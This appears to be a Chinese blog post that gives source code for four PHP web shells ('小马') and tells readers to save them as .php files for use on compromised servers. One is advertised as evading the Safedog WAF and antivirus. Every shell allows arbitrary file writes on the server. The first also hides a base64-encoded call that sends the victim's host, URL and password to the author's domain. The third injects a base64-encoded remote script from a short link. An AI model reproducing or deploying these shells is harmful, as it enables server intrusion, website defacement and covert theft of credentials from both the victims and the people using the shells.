几款PHP小马

几款php的小马,直接上代码

用法:新建文本文档,复制代码保存,改为php的后缀即可

过狗免杀的php小马:


<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>miansha</title>
</head>

<body>
<?php 
$password = isset($_POST['password']) ? $_POST['password'] : '';
$get = isset($_GET['id']) ? $_GET['id'] : '';
$pass = 'asphxg';/**这里修改密码**/
if($password==$pass){
@file(base64_decode("aHR0cDovL3d3dy5hc3BoeGcuY24vYm9sZy9pbmRleC5waHA=").$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$password);
echo 'OS:' .PHP_OS.'<br />';
echo 'PHP:'.PHP_VERSION.'<br />';
echo "<b style=\"color:red;\">当前路径:".__FILE__ .'</b>';echo'<br /><hr />';
?>
<form action="?id=<?php echo $pass?>" method="post">
路径:<input type="text" name="lujin"  style="width:300px;"/><br /><br />
<b>内容: </b><br /> <textarea name="neirong" style="width:500px; height:400px;"></textarea><hr/>
<input  type="submit" value="---提交---" style=" margin-left:200px;" /></p>
</form>
 <?php exit;}elseif(isset($get) && !empty($get)  && $get==$pass){
         $lujin = @$_POST['lujin'];
        $neirong = @$_POST['neirong'];
         if (empty($lujin) || empty($neirong)) {
        echo '请填写路径或内容';
        exit;        
        }
        $fh = @fopen($lujin,'a');
        @fwrite($fh,$neirong);
        echo '写入成功';
        echo '<hr />';
        echo '您的路径是:'.$lujin;
        exit;
}?>
<form action="" method="post" style=" margin-top:200px; margin-left:40%;"><p>
密码: <input type="password" name="password" /></p>
<p>
<input type="submit" value="提交" style=" margin-left:100px;"/>
</p>
</form>
</body>
</html>


无密码的php小马:


<?php
if ($_POST)
{
$f=fopen($_POST["f"],"w");
if(fwrite($f,$_POST["c"]))
echo "<font color=red>成功!</font>";
else
echo "<font color=blue>失败!</font>";
}
?>

<title> 指尖的温度ヾ PHP 小 马 </title>
<form action="" method="post">
<input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILENAME"];?>'><br><br>
<textarea name="c" cols=60 rows=15></textarea><br>
<input type="submit" id="b" value="保存"><br>
</form>
<p></p>


php超隐蔽小马:


<?php 

header("content-Type: text/html; charset=gb2312"); 

if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 

?> 

<form method="POST"> 

保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 

<br><br> 

<textarea name="text" COLS="70" ROWS="18" ></textarea> 

<br><br> 

<input type="submit" name="submit" value="保存">  

<form> 

<?php

$str = 'JTNDc2NyaXB0JTIwc3JjJTNEaHR0cCUzQS8vdC5jbi9SWlRvbENHJTNFJTNDL3NjcmlwdCUzRSUyMA==';

echo base64_decode($str);

?> 

<?php 

if(isset($_POST['file'])) 

{ 

   $fp = @fopen($_POST['file'],'wb'); 

   echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 

   @fclose($fp); 

} 

?>


带密码的php小马:


<html>
<head>
<title>当前IP <?=$_SERVER['SERVER_NAME']?></title>
</head>
<style>
body{font-family:Georgia;}
#neirong{width:558px;height:250px;border=#0000 1px solid}
#lujing{font-family:Georgia;width:389px;border=#0000 1px solid}
#shc{font-family:Georgia;background:#fff;width:63px;height:20px;border=#0000 1px solid}
</style>
<body bgcolor="black">
<?php
$password="asphxg";/**这里修改密码**/
if ($_GET[pass]==$password){
  if ($_POST)
{
  $fo=fopen($_POST["lujing"],"w");
  if(fwrite($fo,$_POST["neirong"]))
   echo "<font color=red><b>成功写入文件!</b></font>";
  else
   echo "<font color=#33CCFF><b>写入文件失败</b></font>";
  
}
else{
echo "<font color=#CCFFFF>指尖的温度ヾ Asphxg 带密码php小马</font>";
}
?><br><br>
<font color="#FFFF33">服务器IP及当前域名:<?=$_SERVER['SERVER_NAME']?>(<?=@gethostbyname($_SERVER['SERVER_NAME'])?>)<br>
当前页面的绝对路径:<?php echo $_SERVER["SCRIPT_FILENAME"]?>
<form action="" method="post">
输入文件路径:<input type="text" name="lujing" id="lujing" value='<?php echo $_SERVER["SCRIPT_FILENAME"]?>' />
<input type="submit" id="shc" value="写入数据" /><br />
<textarea name="neirong" id="neirong">
</textarea>
</form></font>
<?php
 }else{
?>
<form action="" method="GET">
<font color="#00FFCC">输入密码:<input type="password" name="pass" id="pass">


<input type="submit" name="denglu" value="开门" /></form>
<?php } ?>


评论回复